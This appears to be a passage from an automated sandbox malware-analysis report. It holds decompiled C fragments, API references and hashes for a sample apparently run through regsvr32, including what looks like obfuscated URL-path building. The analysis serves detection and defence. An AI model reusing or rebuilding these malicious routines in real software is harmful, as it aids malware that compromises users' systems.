				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E007A2399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E007A3C32(_t101,  &_v428, _a8, _t96 - _t81);
					E007A3C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E007A2399(_t101,  &E007AA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E007A2399(_a16, _a4);
						E007A114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L007A7F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L007A7F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E007A5381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E007A45B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E007A5936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E007AA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x007a1e94
0x007a1ea0
0x007a1ea6
0x007a1eab
0x007a1eaf
0x007a2021
0x007a2025
0x007a2025
0x007a1eb5
0x007a1eb9
0x007a1ebf
0x007a1ec0
0x007a1ecb
0x007a1ed1
0x007a1ed6
0x007a1ed9
0x007a1ef3
0x007a1f02
0x007a1f0e
0x007a1f18
0x007a1f1d
0x007a1f1f
0x007a1f22
0x007a1fd9
0x007a1fdf
0x007a1ff0
0x007a2003
0x007a2019
0x00000000
0x007a201e
0x007a1f2b
0x007a1f32
0x007a1f36
0x007a1f3c
0x007a1f3e
0x007a1f40
0x007a1f42
0x007a1f44
0x007a1f4e
0x007a1f53
0x007a1f55
0x007a1f57
0x007a1f58
0x007a1f59
0x007a1f5a
0x007a1f61
0x007a1f68
0x007a1f6b
0x007a1f6b
0x007a1f38
0x007a1f38
0x007a1f38
0x007a1f73
0x007a1f7b
0x007a1f87
0x007a1f8c
0x007a1f8c
0x007a1f91
0x00000000
0x00000000
0x007a1f93
0x007a1f96
0x007a1fa3
0x00000000
0x00000000
0x007a1fa5
0x007a1fa5
0x007a1fb2
0x007a1f8c
0x007a1f91
0x00000000
0x00000000
0x00000000
0x007a1f91
0x007a1fbc
0x007a1fbf
0x007a1fc2
0x007a1fc9
0x007a1fc9
0x007a1fd6
0x00000000
0x007a1fd6
0x007a1ec2
0x007a1ec6
0x007a1ec7
0x007a1ec9
0x00000000
0x00000000
0x00000000
0x007a1ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 007A1F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 007A1F5A
memset.NTDLL ref: 007A2003
memset.NTDLL ref: 007A2019

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: e162b200bf05631b0419b336ccc1c6b195ac551a0351d57a13234f1af9655d0d
Instruction ID: 3b2c746c72fd44d82e93d2dde367bafdcc839580bcba8c97e502a3483f96ea9d
Opcode Fuzzy Hash: e162b200bf05631b0419b336ccc1c6b195ac551a0351d57a13234f1af9655d0d
Instruction Fuzzy Hash: 7841D071A01219AFEB10DF68CC45BEE7775EF87310F504229B819A7281EB789E45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 007A514D, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 97stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(00000001,00000001), ref: 007A51FE
lstrlen.KERNEL32(00000001,007A92D8,00000028,007A534C,00000000), ref: 007A5209

Strings

LSz, xrefs: 007A51CB
(LSz, xrefs: 007A51CE

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrcmplstrlen
String ID: (LSz$LSz
API String ID: 898299967-2197086664
Opcode ID: aae2b7fc63aebda2b51472e7641fff370386d9586bcd99dab2de1cdb2b3c8f9b
Instruction ID: 0b16a4f7808ed5506c6a4a934e0c6440285215c90e366725534f894326e25fa9
Opcode Fuzzy Hash: aae2b7fc63aebda2b51472e7641fff370386d9586bcd99dab2de1cdb2b3c8f9b
Instruction Fuzzy Hash: 60411BB1905605DFCB18CF99D8846ADBBF1FF9A300B18862EE446E7690E7389941CB14

Uniqueness

Uniqueness Score: -1.00%

Function 007A7289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E007A7289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E007A2616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E007A28B8(_t23);
						}
					}
					return _t38;
				}
				if(E007A4380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x7aa2d4, 1, 0,  *0x7aa394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E007A7360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E007A202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E007A3EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E007A4CD5( &_v32, _t39);
					goto L13;
				}
			}

0x007a7289
0x007a7296
0x007a729c
0x007a729d
0x007a729e
0x007a729f
0x007a72a0
0x007a72a4
0x007a72b0
0x007a72b4
0x007a733c
0x007a733c
0x007a733f
0x007a7341
0x007a7349
0x007a734f
0x007a7352
0x007a7352
0x007a734f
0x007a735d
0x007a735d
0x007a72c7
0x007a72c9
0x007a72c9
0x007a72e0
0x007a72e4
0x007a72e7
0x007a72f2
0x007a72f9
0x007a72f9
0x007a7305
0x007a7306
0x007a7314
0x007a7308
0x007a7308
0x007a7309
0x007a730a
0x007a730b
0x007a730c
0x007a730d
0x007a730d
0x007a7319
0x007a731e
0x007a7320
0x007a7322
0x007a7322
0x007a7329
0x00000000
0x007a732b
0x007a732b
0x007a7338
0x00000000
0x007a7338

APIs

CreateEventA.KERNEL32(007AA2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,007A1C40,?,00000001), ref: 007A72DA
SetEvent.KERNEL32(00000000,?,?,?,?,007A1C40,?,00000001,007A2F7D,00000002,?,?,007A2F7D), ref: 007A72E7
Sleep.KERNEL32(00000BB8,?,?,?,?,007A1C40,?,00000001,007A2F7D,00000002,?,?,007A2F7D), ref: 007A72F2
CloseHandle.KERNEL32(00000000,?,?,?,?,007A1C40,?,00000001,007A2F7D,00000002,?,?,007A2F7D), ref: 007A72F9

Part of subcall function 007A7360: WaitForSingleObject.KERNEL32(00000000,?,?,?,007A7319,?,007A7319,?,?,?,?,?,007A7319,?), ref: 007A743A
Part of subcall function 007A7360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007A7319,?,?,?,?,?,007A1C40,?), ref: 007A7462

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 6bf13fa119a59bbf05c7d005385bba10ce1ccea88662d870f324cbf3004d8a01
Instruction ID: d9fc055de07897f30e14cb304688ae771b46bfba1ea5123a1ba8b2fe610729bc
Opcode Fuzzy Hash: 6bf13fa119a59bbf05c7d005385bba10ce1ccea88662d870f324cbf3004d8a01
Instruction Fuzzy Hash: 0721C573904159EBCF10AFE48C859EE7779ABC6350B468625FA11A7140D77CDD01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E083A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E0E5C: _free.LIBCMT ref: 6D4E0E6A

Part of subcall function 6D4E1A36: WideCharToMultiByte.KERNEL32(?,00000000,6D4E27CC,00000000,00000001,?,_HNm,?,6D4E27CC,?,00000000,?,6D4E45CE,0000FDE9,00000000,?), ref: 6D4E1AD8

GetLastError.KERNEL32 ref: 6D4E08A2
__dosmaperr.LIBCMT ref: 6D4E08A9
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D4E08E8
__dosmaperr.LIBCMT ref: 6D4E08EF

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction ID: 21d260819395979812b9bbd63eb2df4e672626c9cd9e2db87c693ccd0176e6a5
Opcode Fuzzy Hash: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction Fuzzy Hash: CB21747160861ABFAB109F678C80D6BB7ADFF413EA7158528E57897250EF30ED4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1C59, Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction ID: 76227c668dfce68c6afca3ddfea8e4319b5ef131d245a6f4b917d9ce4e8b7302
Opcode Fuzzy Hash: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction Fuzzy Hash: B021DB71E85621B7DF1287649C84F6A37686F427E2B224115ED16E7381D730ED01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E02DC, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4E4315,?,00000001,6D4E27CC,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?), ref: 6D4E02E1
_free.LIBCMT ref: 6D4E033E
_free.LIBCMT ref: 6D4E0374
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC), ref: 6D4E037F

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction ID: bc7ff0b20d7f609026df3f0d8012ee6f409ee0379b525228fc4f6e7f9b639ad0
Opcode Fuzzy Hash: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction Fuzzy Hash: D011A7362496067BDB31967A5C80F2B217A9BC23FBB2A422CF234962D5DF308C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0433, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,00000001,6D509096,6D4E06CB,6D4E0611,6D509094,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E0438
_free.LIBCMT ref: 6D4E0495
_free.LIBCMT ref: 6D4E04CB
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E04D6

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction ID: d2b9641afe75566c3df2180903c3c2a59ed5fbd2900c54d7c1ea34eb1fb69cbd
Opcode Fuzzy Hash: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction Fuzzy Hash: F911AC366496023ADF11967ADD84F27227A9BC22F7B2A433CF638A62D0DF318C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE723, Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,6D4DE7E4,?,?,6D51AA24,00000000,?,6D4DE90F,00000004,6D5033BC,6D5033B4,6D5033BC,00000000), ref: 6D4DE7B3

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction ID: a649fcededa5587265eb86119c4e5a96778eb533337fca3aa28abf5dba02169a
Opcode Fuzzy Hash: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction Fuzzy Hash: E211C636A45622ABDFE29A68CCD4F5AB7B4AF03770F254131EA55E7380D770ED0086D1

Uniqueness

Uniqueness Score: -1.00%

Function 007A4138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007A4138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x7aa290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x7aa2a8; // 0x64c8c34a
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x7aa2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x007a4140
0x007a4143
0x007a4149
0x007a4161
0x007a4165
0x007a4168
0x007a416a
0x007a416d
0x007a416f
0x007a4172
0x007a4174
0x007a4174
0x007a4176
0x007a4181
0x007a4186
0x007a4197
0x007a419f
0x007a41a4
0x007a41a7
0x007a41aa
0x007a41ac
0x007a41b2
0x007a41b5
0x007a41b5
0x007a41b5
0x007a41c0
0x007a41c5
0x007a41cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007A5B76,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A4143
RtlAllocateHeap.NTDLL(00000000,?), ref: 007A415B
memcpy.NTDLL(00000000,05299630,-00000008,?,?,?,007A5B76,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A419F
memcpy.NTDLL(00000001,05299630,00000001,007A6301,00000000,05299630), ref: 007A41C0

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 7b4c65da0c486c27dde20eea040ba58ee3553a55cb58d9a18795d91f9af69463
Instruction ID: 04135d656dddff2719609751545acb71fda04b8e8a8c60d19171298f7ad906d3
Opcode Fuzzy Hash: 7b4c65da0c486c27dde20eea040ba58ee3553a55cb58d9a18795d91f9af69463
Instruction Fuzzy Hash: AF113672A00108BFC310CB69DC88E9FBBBEEBC63A0B144266F50497150E7799E04C760

Uniqueness

Uniqueness Score: -1.00%

Function 007A49BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E007A49BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E007A5C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x7a92c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x7a92c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x007a49c5
0x007a49c9
0x007a49cb
0x007a49cc
0x007a49d4
0x007a49d4
0x007a49d8
0x00000000
0x00000000
0x007a49cf
0x007a49d0
0x007a49d3
0x007a49d3
0x007a49e0
0x007a49e7
0x007a49eb
0x007a49f3
0x007a49f9
0x007a49fb
0x007a4a00
0x007a4a04
0x007a4a06
0x007a4a09
0x007a4a10
0x007a4a10
0x007a4a1a
0x007a4a1d
0x007a4a20
0x007a4a20
0x007a4a2c
0x007a4a2c
0x007a4a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0529962C,?,?,?,007A6072,0529962C,?,?,007A2F44), ref: 007A49D4
StrTrimA.SHLWAPI(?,007A92C4,00000002,?,?,?,007A6072,0529962C,?,?,007A2F44), ref: 007A49F3
StrChrA.SHLWAPI(?,00000020,?,?,?,007A6072,0529962C,?,?,007A2F44,?,?,?,?,?,007A44F9), ref: 007A49FE
StrTrimA.SHLWAPI(00000001,007A92C4,?,?,?,007A6072,0529962C,?,?,007A2F44,?,?,?,?,?,007A44F9), ref: 007A4A10

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: b514d8bf72c2580ea3fc051aa5078e9aa0418130434ce361a45971aa29985ada
Instruction ID: 2cc5960e4a6da324d152e8e12bcb27bfe438698f17a08ddc534dd9f5e442674e
Opcode Fuzzy Hash: b514d8bf72c2580ea3fc051aa5078e9aa0418130434ce361a45971aa29985ada
Instruction Fuzzy Hash: D001D8716453257FC2218F59DC49F27BAA8FBC7B60F110719F981C7280EBA9DC0186B5

Uniqueness

Uniqueness Score: -1.00%

Function 007A1970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E007A1970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E007A354E(_t8, _t1);
				_t16 = E007A5C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E007A756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E007A5C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E007A2A03(_t16);
				}
				return _t18;
			}

0x007a197b
0x007a197c
0x007a197f
0x007a1981
0x007a198c
0x007a1990
0x007a1995
0x007a1999
0x007a19a1
0x007a19a6
0x007a19ae
0x007a19ae
0x007a19b7
0x007a19bb
0x007a19c1
0x007a19c4
0x007a19ca
0x007a19ca
0x007a19d2
0x007a19d2
0x007a19d9
0x007a19d9
0x007a19e4

APIs

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

Part of subcall function 007A756E: wsprintfA.USER32 ref: 007A75CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,007A3EC5,74666F53,00000000,?,00000000,?,?,007A2F4F), ref: 007A19A6
lstrcpy.KERNEL32(00000000,00000000), ref: 007A19CA
lstrcat.KERNEL32(00000000,00000000), ref: 007A19D2

Strings

Soft, xrefs: 007A197C, 007A1995

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: ec5dea837ed3f01c0956077708d07ee00bc74a9ad03cb4555ffa1180b6b9aa96
Instruction ID: 08bb85f4ee70ae3f9bdb24189803837f93df2582b4048c14fe6b38c0d625aa4b
Opcode Fuzzy Hash: ec5dea837ed3f01c0956077708d07ee00bc74a9ad03cb4555ffa1180b6b9aa96
Instruction Fuzzy Hash: FD01D63210025AB7DB127B699C8CEEF3A6DAFC6391F048221FA0459105DB7CC955C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E5566, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001), ref: 6D4E557D
GetLastError.KERNEL32(?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001,?,6D4E47F8,['Nm), ref: 6D4E5589

Part of subcall function 6D4E554F: CloseHandle.KERNEL32(6D5098D0,6D4E5599,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001), ref: 6D4E555F

___initconout.LIBCMT ref: 6D4E5599
WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E55AE

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseErrorHandleLast___initconout
String ID:
API String ID: 892448922-0
Opcode ID: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction ID: 3bcd926009afb093f79b9f06d150f185f46bab88ac14716b933eb004d59d138d
Opcode Fuzzy Hash: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction Fuzzy Hash: 82F0F836401965BBCF626F958D08E993F76EF8A3B2F064014FA1985224C732CD20DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 007A6027, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E007A6027(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x7aa37c; // 0x5299630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x7aa37c; // 0x5299630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x7aa030) {
					HeapFree( *0x7aa290, 0, _t8);
				}
				_t14[1] = E007A49BA(_v0, _t14);
				_t11 =  *0x7aa37c; // 0x5299630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x007a6027
0x007a6027
0x007a6030
0x007a6040
0x007a6040
0x007a6045
0x007a604a
0x00000000
0x00000000
0x007a603a
0x007a603a
0x007a604c
0x007a6050
0x007a6062
0x007a6062
0x007a6072
0x007a6075
0x007a607a
0x007a607e
0x007a6084

APIs

RtlEnterCriticalSection.NTDLL(052995F0), ref: 007A6030
